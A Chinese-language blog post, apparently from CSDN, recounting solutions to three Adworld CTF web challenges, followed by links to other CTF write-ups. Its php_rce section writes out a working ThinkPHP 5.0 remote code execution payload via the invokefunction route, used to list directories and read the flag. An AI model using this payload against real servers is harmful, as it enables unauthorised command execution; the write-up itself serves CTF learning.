攻防世界——Web高手区初试

最新推荐文章于 2024-08-14 22:26:03 发布
最新推荐文章于 2024-08-14 22:26:03 发布
阅读量246 收藏
点赞数
分类专栏: 小杨的CTF之旅 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746876/article/details/114689808
版权

攻防世界——Web高手区初试

前言

由于放假的原因,好久好久都没有更新了,整个人懒得就离谱,啥也不太想做,所以就停更了好久好久,虽然Kali网络渗透测试课程结束了,但是停课不停学,所以还是得让自己多学一点儿东西,多做一些总结叭

1.baby_web

看题目应该是道签到题,题目提示了 “想想初始页面是哪个”
在这里插入图片描述
很自然想到了 index.php,但是访问 index.php 的时候总会跳转到 1.php,所以可以使用Burpsuite 进行抓包(在浏览器设置好代理,然后访问index.php并使用Burpsuite进行抓包):
在这里插入图片描述
还有一种方法就是访问两次 index.php,然后F12查看index.php:
在这里插入图片描述
在index.php里面也可以拿到flag的

在这里插入图片描述

2.Training-WWW-Robots

首先打开题目,可以看到下面的这一串英文:

在这里插入图片描述
大致说的就是你将学到robots协议啥啥啥的,然后根据题目所给信息,查看一下robots.txt:
在这里插入图片描述
再接下去查看f10.php,就可以得到本题的flag啦
在这里插入图片描述

3.php_rce

在这里插入图片描述
拿到题目,先看看里面的东西,但是下面这几个链接点进去都是真实的场景,题目本身也没有提示,所以就先看看 ThinkPHP5 还有 V5.0版本是啥,百度发现ThinkPHP框架的V5.0版本是有远程代码执行漏洞的,于是找到跟着漏洞的利用方式就好啦

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(Linux命令)

ls查看文件目录:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

查看上一级目录:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls …/

查看根目录下:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

在这里插入图片描述
查看flag:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

在这里插入图片描述

4.Web_php_include

(待添加……还没有理解其中原理,等查好资料整理好语言再更新叭)

山野下
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-web高手进阶
zji
04-25 5084
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界web新手总结
cherish的技术博
04-20 378
目录前言backupsimple_phpxff_refererget_postsimple_js 前言 我还是太菜了,这篇就放一些查了writeup的 攻防世界网址:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1 backup 基础知识: 常见的备份文件后缀名有: .gi...
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界upload3
qq_28808571的博客
05-25 778
1.看到题目为文件上传,且题目描述中有源码泄露。将源码下载后发现为thinkphp5.1,于是直接百度发现thinkphp5.x的反序列化漏洞,但是由于源码中含有查找文件,一开始误以为是文件名注入. 但对源码的审计发现,对上传的文件检查还是比较严格的 还检查了文件头,但是可以使用GIF89a+一句话还是能够上传成功的,上传成功后可以在上传界面查看源码得到路径 结合源码发现这是 ...
史上最详细系列--攻防世界web(高手进阶1-4)
weixin_43911311的博客
03-31 2022
1.Baby web 首先看题目描述 是不是直接给了提示呢,答案是index.php 所以只需要打开index.php界面就能得到结果 当你输入index.php的时候,会自动跳转两次,所以最后还是1.php界面 此时需要F12,打开network 再次输入index.php,会抓取到以下结果 所以结果就出来了flag{very_baby_web} 2.Training-W...
路由器漏洞靶场 The Damn Vulnerable Router Firmware Project 的学习(持续更新)
qq_41071646的博客
08-06 578
看wiki 感觉看的也还行了 打算最近把 攻防世界的题 再看看 然后去肝一下buuctf上面的题目 然后 发现了一个 这个 路由器漏洞靶场 里面有源代码 还有编译好的 程序 然后 里面一共有三个 这里面也有三个 这里 从名字也能看出来利用的漏洞种类 这个项目的地址, https://github.com/praetorian-inc/DVRF 这里面还有源...
攻防世界web高手进阶php_rce,CTF-攻防世界-web-php_rce(ThinkPHP远程代码执行)
weixin_39637924的博客
03-09 381
题目今天做CTF的时候,遇到下面这道题,看上去应该跟ThinkPHP版本5的相关漏洞。之前听过ThinkPHP有漏洞,具体情况不清楚。。。 解题过程去vulhub上搜了下ThinkPHP,还真有,把docker容器打开看了下,页面一摸一样哈哈: 这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:输入:http://your-ip:8080/index.php?s=/Inde...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界web进阶全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2407
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
攻防世界web新手合集
CNXBDSa的博客
08-07 3200
攻防世界(xctf)做题合集-get_post- robots-backup-cookie-disabled_button-simple_php-weak_auth-xff_referer-simple_js-command_execution 注意有些题需要直接实践-不去实践永远别想进步 1.view_source 打开 然后查看源代码就找到flag了 cyberpeace{32b6a4b190...
攻防世界-- web高手进阶-- writeup汇总
yisosooo的博客
09-22 6311
随做随记,争取记录详细思路,以供后续反思。 第一题-- cat 按照提示输入loli.club,没有任何回显。输入baidu.com也没有任何回显。再次尝试输入127.0.0.1,出现: 可知,submit其实是ping命令,而且好像只对ip地址起作用。尝试运行系统命令: 失败。输入127.0.0.1 | ls 同样失败。但是发现URL编码可以传入。当输入到%80时,出现报错信息,...
攻防世界-web-shrine-从0到1的解题历程writeup
CTF小白的博客
04-13 4560
题目环境分析 首先开启靶机获取到题目如下 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<...
攻防世界-shrine wp
m0_47571887的博客
11-03 179
首先打开场景 右击查看源代码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): d...
攻防世界--shrine-(详细操作)做题笔记
qq_43715020的博客
06-14 968
攻防世界--shrine-笔(详细操作)做题笔记
安全工具推荐-Search_Viewer资产测绘】
最新发布
qq_55213436的博客
08-14 201
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值